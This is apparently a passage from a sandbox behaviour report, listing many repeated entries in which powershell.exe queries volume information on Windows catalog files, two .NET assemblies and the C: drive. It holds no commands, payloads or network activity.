Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
